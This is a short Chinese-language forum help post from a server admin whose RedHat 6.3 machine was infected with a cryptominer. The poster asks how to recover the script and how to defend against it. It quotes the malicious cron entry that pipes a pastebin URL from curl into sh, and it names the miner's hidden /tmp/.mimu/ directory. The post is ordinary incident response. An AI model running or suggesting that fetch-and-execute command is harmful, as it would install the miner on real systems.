环境介绍: 1 、redhat 6.3 2 、对外开启了 9000:80 端口的映射 3 、强密码验证(限制指定 IP 通过 ssh 连接)
已知信息: 1 、crontab -l 得知被添加了计划任务:curl -fsSL https://pastebin.com/raw/8DdBvkRn | sh (我尝试得到该脚本,但是请求出来只是字符串‘#endif’,我该如何得到该病毒脚本? top 查看进程时候有看到 /tmp/.mimu/apache.sh ,但是实际去查看该病毒目录,并没有发现脚本,是否加载在内存中,实际脚本已被删除?) https://imgur.com/Huflmd7 https://imgur.com/2PZNjXR
2 、已知该脚本会生成隐藏目录 /tmp/.mimu/,下面包含挖矿程序 kthmimu 及配置文件 config.json https://imgur.com/Huflmd7
已自行尝试复现的测试: 1 、尝试 curl -fsSL https://pastebin.com/raw/8DdBvkRn | sh ,但是我并没有发现脚本文件及复现
求助: 1 、如何找出该脚本及实现逻辑? 2 、如何防范?
6
Select Language